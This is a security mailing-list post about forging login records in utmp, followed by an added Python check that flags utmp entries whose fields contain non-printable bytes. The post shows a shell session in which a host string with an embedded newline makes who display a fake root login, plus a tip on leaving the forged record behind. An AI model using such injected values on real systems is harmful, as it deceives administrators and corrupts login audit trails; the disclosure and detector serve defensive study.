I have not yet found any uses for utmp/wtmp: maybe Joey is right and there is no security issue. I would then suggest that to increase security, setuid/setgid bits be removed from all utmp/wtmp maintainers.

In the meantime, I hope that conscientious sysadmins do look at who and last output occasionally; and expect that

[EMAIL PROTECTED]:~$ exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')" & sleep 1; who; sleep 6
[1] 22149
Writing utmp (who) record ...
utmp record will be cleaned up when we exit.
To leave it behind, kill gnome-pty-helper: kill 22152
Sleeping for 5 secs...
psz pts/2 Oct 12 12:16 (XX)
root tty01 Jan 01 02:03 (insecure.com)
psz pts/1 Oct 12 11:37 (y622.yt.maths.usyd.edu.au:0.0)
[1]+ Done exploit "$(perl -e 'print "XX)\nroot tty01 Jan 01 02:03 (insecure.com"')"
[EMAIL PROTECTED]:~$

should suitably freak them out.

Cheers,

Paul Szabo [EMAIL PROTECTED] http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
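
Added example, not part of the original message: a check that reads utmp records directly and flags login entries whose text fields contain non-printable bytes, such as the embedded newline that makes who print the extra "root" line above. It assumes glibc's 384-byte Linux struct utmp layout; the sample records and their PIDs are constructed.

```python
import struct

# Assumption: glibc's Linux "struct utmp", 384 bytes per record.
UTMP = struct.Struct("<hxxi32s4s32s256shhiii4i20s")
USER_PROCESS = 7  # ut_type of the login sessions that who(1) lists


def cstr(raw):
    """Field bytes up to the first NUL; latin-1 keeps every byte visible."""
    return raw.split(b"\0", 1)[0].decode("latin-1")


def unprintable(text):
    """True if the field holds anything other than printable ASCII."""
    return any(not 0x20 <= ord(ch) < 0x7F for ch in text)


def audit(data):
    """Return one finding per login record whose text fields would corrupt who output."""
    findings = []
    for off in range(0, len(data) - UTMP.size + 1, UTMP.size):
        rec = UTMP.unpack_from(data, off)
        if rec[0] != USER_PROCESS:
            continue
        fields = {"ut_line": cstr(rec[2]), "ut_user": cstr(rec[4]), "ut_host": cstr(rec[5])}
        bad = [name for name, value in fields.items() if unprintable(value)]
        if bad:
            findings.append({"pid": rec[1], "line": fields["ut_line"], "fields": bad,
                             "host": repr(fields["ut_host"])})
    return findings


def make_record(pid, line, user, host):
    """Build a constructed USER_PROCESS record for the sample below."""
    return UTMP.pack(USER_PROCESS, pid, line.encode(), b"", user.encode(),
                     host.encode(), 0, 0, 0, 0, 0, 0, 0, 0, 0, b"")


# Constructed sample: one ordinary session and one with the host string from the message.
SAMPLE = (make_record(1001, "pts/1", "psz", "y622.yt.maths.usyd.edu.au:0.0")
          + make_record(1002, "pts/2", "psz", "XX)\nroot tty01 Jan 01 02:03 (insecure.com"))

if __name__ == "__main__":
    for f in audit(SAMPLE):  # pass open("/var/run/utmp", "rb").read() on a live host
        print(f"pid {f['pid']} on {f['line']}: suspicious {f['fields']} host={f['host']}")
```

Reading the binary records rather than the who output matters here: the forged line only exists once the host field is printed, while the record itself still shows a single session on pts/2.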